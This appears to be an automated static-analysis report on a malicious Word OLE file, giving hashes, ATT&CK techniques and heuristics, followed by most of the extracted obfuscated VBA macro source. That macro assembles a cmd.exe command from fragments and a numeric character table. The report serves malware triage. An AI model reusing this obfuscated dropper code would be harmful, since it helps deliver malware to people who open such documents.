Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e824aa57324ee6d6…

MALICIOUS

Office (OLE)

103.5 KB First seen: 2019-04-18
MD5: 81bcf324b5a9dc486b90ac7882dd22fb
SHA-1: f7bb18fe33f04e65d38be86817eaee2d30e48f8b
SHA-256: e824aa57324ee6d6d5060479431446ce91404778f9feee2c72002c28bae92eaa
Risk Score: 124

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The file contains legacy WordBasic macros, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The script attempts to construct a command string, likely for downloading and executing a payload, by concatenating various string fragments. The heap spray and slack anomalies suggest memory manipulation and potential obfuscation techniques are in use.

Heuristics (6)

  • Heap-spray pattern detected (high) SC_HEAP_SPRAY
    Repeated 0x04 bytes found
    Disassembly: attempted x86 opcode disassembly of the repeated bytes
  • OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY
    OLE file is 105,979 bytes but its declared streams total only 59,652 bytes — 46,327 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (medium) OLE_VBA_MACROS
    Document contains VBA macro code
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12027 bytes
SHA-256: ced1c0e50c7616969afc05f9b886bd3d53fed9ea4dd418c7244a0a1f4ec4c42a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
122 of 193 identifiers look randomly generated (e.g. 'pVGqKtUwQDblUJ'), and 1 string-concatenation chain was found; this is consistent with name-mangling obfuscation and with a command string assembled from fragments at runtime.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
   TypeName 5
   TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
   TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + "  =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
   TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
   TypeName Log(2157)
   TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
   TypeName Atn(9305)
   TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
   TypeName Cos(86757 / Coilz)
   TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
   TypeName CSng(MRbjP)
   TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
   TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
   TypeName CStr(MktFL)
   TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
   TypeName 77
   TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
   TypeName TFQzX
   TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
   TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
   TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
   TypeName 66
   TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
   TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
   TypeName Rnd(PNNti)
   TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
   TypeName 1059
   TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
   TypeName Round(18040 * zMfzwu)
   TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
   TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
   TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
   TypeName Rnd(201076278)
   TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
   TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
   TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
   TypeName Sqr(YpNCC)
   TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
   TypeName CLng(KwzmUa)
   TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32," + "2,2" + "9,2" + "2," + "28," + "31," + "57,"
TypeName hanNc
   TypeName CBool(pFfiCc)
   TypeName Round(586)
wdowEU = "4" + "0," + "68," + "5" + "7" + ",27" + "," + "61," + "25" + "," + "4" + "1,1" + "3"
SrLJcKU = vznVCcFb + HQuHjnR + ljZzjDHRc + JfrXu + JmKwkvO + NBHoJQOXV + wDAGGP + jLcazYaNlpm + RtUVbJWOdT + wdowEU
   TypeName Rnd(7763)
   TypeName Oct(patquL)
End Function
Function jqfOKroKkj()
On Error Resume Next
TypeName WutWJ
   TypeName 335
jMmupz = ",34" + ",39" + ",1," + "58" + ",48" + "," + "2" + "8,7"
TypeName 3944
   TypeName Atn(436225468)
   TypeName 940
JaIQcjwri = "0" + ",3," + "2" + ",2," + "23," + "36," + "25," + "2"
TypeName wmhREY
   TypeName Tan(15997 * NwCriY / VAzENw / vtzTB)
   TypeName CByte(298013308)
bOFKjU = "5," + "15," + "2" + "8," + "32" + ",4" + "6," + "40,"
TypeName RSdwI
   TypeName Hex(293095284)
   TypeName 8
IdouPRCDPUS = "4" + "6," + "2" + "," + "6," + "40" + ",2"
TypeName ChrB(96149 - vpIMw)
   TypeName 149
nCbMbos = "," + "46" + ",22" + ",40" + "," + "46," + "2"
TypeName Fix(kdcvQJ)
   TypeName Atn(ZzMiiL)
   TypeName dbwkHm
DHwjkFiKnnA = ",6" + "8," + "57" + ",27" + ",61" + ",68" + ",3" + "1," + "22"
jqfOKroKkj = jMmupz + JaIQcjwri + bOFKjU + IdouPRCDPUS + nCbMbos + DHwjkFiKnnA
   TypeName Round(arsJrZ / UUEhpW / 24776 * nPHdqT)
   TypeName 647
   TypeName CSng(MjXEkq / FzOqSd)
End Function
Function UVMStnSwnuS()
On Error Resume Next
TypeName Int(6)
   TypeName Log(JNGLGG)
IkpCjZ = ",25" + "," + "49" + "," + "73" + "," + "5" + "2,"
TypeName 160626531
   TypeName CLng(iumNmH + wHCbji / cpHWX + wYDJJ)
   TypeName Fix(kFcJwn + 95604 - KMBEK + UaYFZi)
SWTJq = "2," + "1" + "5,7" + "0," + "3," + "2" + "," + "2," + "23," + "36" + ",25" + ","
TypeName Round(31991 * sjntGr + 55381 - LdMrf)
   TypeName 49
   TypeName 6998
VqhFzJv = "25," + "56," + "27," + "13" + "," + "3"
TypeName Round(RcGRMc / 58182 + fEksdA / dROADN)
   TypeName zsjVdv
   TypeName 81
IIpGN = ",2" + "7" + ",1" + "6," + "57,"
TypeName NRnsa
   TypeName PIMYT
azlTYci = "28" + ",2" + "2" + ",6" + "8,5" + "7,2" + "7" + "," + "61,"
TypeName Rnd(BCbOw * ZzsJZf)
   TypeName 155
TIIfTzWc = "25" + "," + "34" + ",73" + ",21"
TypeName CInt(99808 + HqPiBl)
   TypeName CBool(poEFLi)
buzXUi = ",69" + "," + "28" + ",5" + "4," + "7" + "0," + "3,2" + ","
TypeName Oct(bsDNh)
   TypeName SuiArD
IqMUhd = "2," + "23," + "36" + "," + "2" + "5" + ",25" + "," + "1" + "6" + ",3"
TypeName 3113
   TypeName CBool(MclcAR)
   TypeName Fix(43970 / pUthf / zzZKw * 27125)
FbtJYkA = ",4" + "6,4" + "6" + ",3" + "2," + "31," + "28" + ",3" + "2" + ",28" + ",40"
TypeName Int(vQimKJ * tOuWU * VARND / RwidX)
   TypeName Sgn(QGCqAm - ztPSw + jabTra - TYNDAr)
   TypeName ChrB(IstzpJ)
rjlBvMzCnw = ",5" + "7,4" + "6,2" + "," + "22," + "2" + "8," + "6" + ",4" + "0" + ",6," + "40" + ",56"
TypeName hfllUh
   TypeName 74
nnNdwowqNUK = ",6" + "8" + ",57" + "," + "27,"
TypeName TzXvp
   TypeName 3794
   TypeName npNnLm
RWMWXFu = "6" + "1" + "," + "25" + ",3" + "4" + "," + "6"
UVMStnSwnuS = IkpCjZ + SWTJq + VqhFzJv + IIpGN + azlTYci + TIIfTzWc + buzXUi + IqMUhd + FbtJYkA + rjlBvMzCnw + nnNdwowqNUK + RWMWXFu
   TypeName 7381
   TypeName Hex(APFNo + RYkhRS)
End Function
Function cXoQHhaw()
On Error Resume Next
TypeName Round(501543854)
   TypeName 8371
GWLHEIizi = ",32" + "," + "63," + "68" + "," + "33" + ","
TypeName Sgn(UzJrV)
   TypeName 898
   TypeName Rnd(qoVtKk / hzTHRo + 60897 + KIfUqY)
UzhjbafnA = "23," + "3" + "2," + "6" + "," + "2," + "38,"
TypeName Int(25551 * vkbjOo - 13413 / zkYkub)
   TypeName sKpzC
   TypeName Sgn(100467305)
ofjQQQOvKu = "63," + "70," + "63" + "," + "37," + "45" + ",5"
TypeName AzuAi
   TypeName AMBCWw
   TypeName Sin(11905 / WEEQv)
ERObww = "9" + "," + "6" + ",6" + "5," + "54,"
TypeName ChrW(2284)
   TypeName 503764122
   TypeName Atn(TwORiK + QFAqsN * dCnHmz * hiiFX)
wKAtUf = "62" + ",2" + "4" + ",6" + "2," + "63," + "50,"
cXoQHhaw = GWLHEIizi + UzhjbafnA + ofjQQQOvKu + ERObww + wKAtUf
   TypeName Hex(jnOJif - wjRkV + lFZdq / mtjRzv)
   TypeName Tan(TjLKjZ)
End Function
Function XfuLUTYcN()
On Error Resume Next
TypeName 2365
   TypeName jfwVDE
   TypeName CInt(4750 / qwZEbh)
WZomVXIQM = "4" + "1" + ",3" + "4,6" + "3" + "," + "4"
TypeName zWOOzt
   TypeName ChrB(3459)
ufjWQWwjMmP = "5,5" + "9" + ",6" + "5," + "35,"
TypeName CLng(559)
   TypeName Tan(425541703)
ktmOOiMPlX = "2," + "24" + ",5" + "9," + "46," + "4" + "0"
TypeName CLng(470)
   TypeName swuLf
zWRLciNa = ",15" + ",36" + ",2," + "46," + "61," + "2" + "3," + "72,"
TypeName 1
   TypeName CLng(zTspui)
   TypeName kHcaqN
wLRRT = "63," + "6" + "4" + "," + "63," + "7" + "2," + "59" + ",6" + ",6" + "5,5"
TypeName CByte(5890 - njjBfB + jGhVTB * WvQuH)
   TypeName kncPoM
   TypeName Atn(113459832)
CfmOizoh = "4" + ",72" + "," + "63" + ",68" + ",46" + ",2" + "6," + "4" + "6," + "63,"
TypeName 76
   TypeName Round(cjCvrv)
   TypeName ENYDHR
MACwzMubmjV = "4" + "5," + "67" + "," + "2" + "7" + "," + "2" + "2,4" + "6,2" + "8,"
TypeName ChrB(vwbYz)
   TypeName 7506
jSDRv = "57" + "," + "3," + "3" + "8" + ",5" + "9,6"
TypeName CDate(13954 * qoAiVI)
   TypeName Sgn(RDaDVF)
vLsKHn = "6,1" + "6,4" + "7" + ",62" + ",6," + "40," + "62" + ",5" + "9" + "," + "2" + "1" + ",7"
TypeName Cos(92)
   TypeName 8
cvtcFtMREYI = "1" + "," + "67," + "3" + "7," + "53," + "2,"
XfuLUTYcN = WZomVXIQM + ufjWQWwjMmP + ktmOOiMPlX + zWRLciNa + wLRRT + CfmOizoh + MACwzMubmjV + jSDRv + vLsKHn + cvtcFtMREYI
   TypeName ChrW(wiqjG / zHdwAC * 69575 - zCEiC)
   TypeName CInt(7)
End Function
Function qjOpKzfk()
On Error Resume Next
TypeName Tan(SdrbVI)
   TypeName Atn(12074 - JmnIzT + hKjNV * YTLHO)
   TypeName Round(KpDYtX)
zErFpEHNzm = "22," + "42" + ",5" + "3" + ",5" + "9,2" + "3,6" + "6," + "48," + "68," + "60," + "27"
TypeName CLng(4206)
   TypeName 8721
   TypeName 2
bbYrA = "," + "16," + "40" + ",32" + ",27" + "," + "28" + ",5" + "2,4" + "7,6" + ",32" + ","
TypeName CInt(JtzWpE)
   TypeName Sin(19946 - kiMTP)
pFidUzqiCil = "4" + "6,3" + "8," + "5" + "9" + ",6" + "6," + "16" + ",4" + "7" + "," + "5"
TypeName 650
   TypeName Chr(uEHfU - OOaRIT)
   TypeName Log(1)
ACGczQvXE = "1," + "62," + "59" + "," + "6" + "5,3" + "5,"
TypeName 204696817
   TypeName 613
   TypeName VoSJKo
iVHtPzJzJz = "2" + "," + "37" + "," + "45" + ",33" + ",2" + "," + "2" + "8" + ","
TypeName ChrW(71)
   TypeName CSng(aIwrw)
HQfzDII = "22" + ",2," + "30," + "3" + "5" + ",22" + ",2"
TypeName iiZPI
   TypeName 9
   TypeName Log(BBCwb)
VkXrHzSB = "7," + "57" + ",4" + "6," + "1"
qjOpKzfk = zErFpEHNzm + bbYrA + pFidUzqiCil + ACGczQvXE + iVHtPzJzJz + HQfzDII + VkXrHzSB
   TypeName 332
   TypeName 34
End Function
Function khOUbITmDB()
On Error Resume Next
TypeName Tan(91992 * uTqPNC)
   TypeName Cos(URWTf)
HrzQaAilk = "3,1" + "3,6" + "2,5" + "9," + "6"
TypeName FGfrf
   TypeName Log(3)
   TypeName CLng(76565 + WklmW)
IrHCBqwVrn = "5,3" + "5,2" + ",4" + "5," + "3" + "1," + "22" + ",46" + ",2" + "8," + "55,"
TypeName 3958
   TypeName 838
   TypeName Sqr(35778 - iPoJB)
okWFA = "45" + ",43" + "," + "57" + ",2" + "8" + ",2," + "5" + "7" + "," + "3,5" + "3,"
TypeName EECjCN
   TypeName jTPrHU
   TypeName CSng(200)
FQAHhsAMw = "43" + ",4" + "3," + "62," + "62" + "," + "62," + "6" + "2,6" + "2"
TypeName Chr(FZETtB - SDUti + 2166 + 87165)
   TypeName CInt(61105 + cCAKhh)
   TypeName ChrB(83804423)
pzciBzdD = "," + "62" + "," + "62" + ",62" + "," + "62" + "," + "6" + "2," + "62" + ",6" + "2"
TypeName 4
   TypeName Log(jzIciI / KjYqWz)
   TypeName bilwJ
zDMlPIj = ",62" + ",6" + "2" + ",62" + ",62" + "," + "62" + ","
TypeName GzpAvl
   TypeName Int(nzIAzi + 57548)
   TypeName CBool(75)
FDaHuUw = "8" + "0)d" + "o " + "set" + " " + "~  " + "  =" + "!~ " + "   " + "!!#" + "  "
TypeName CStr(CBOfSD + AVqafC)
   TypeName Atn(thjunj)
qOWOoIrDAzW = " :~" + "%" + "p," + "1!" + "&" + "&if" + " %" + "p " + "geq" + " 80" + " ca" + "ll" + " "
khOUbITmDB = HrzQaAilk + IrHCBqwVrn + okWFA + FQAHhsAMw + pzciBzdD + zDMlPIj + FDaHuUw + qOWOoIrDAzW
   TypeName CBool(5)
   TypeName Int(bKqYv - izPlML)
   TypeName CBool(1834)
End Function
Function SwAEVG()
On Error Resume Next
TypeName CInt(462178316)
   TypeName 6067
XEkwBX = "%" + "~ " + "   " + ":" + "*~"
TypeName YIDHQ
   TypeName Sgn(uHqTin)
   TypeName CDate(YPnwzz)
FKudlhzwH = "  " + "  !" + "=" + "%" + CStr(Chr(pVGqKtUwQDblUJ + XJzqbaC + 34 + wOnfIWpzRqnHt + FARlsQU)) + "  " + " "
SwAEVG = XEkwBX + FKudlhzwH
   TypeName 252469504
   TypeName Atn(jocjB)
   TypeName 6
End Function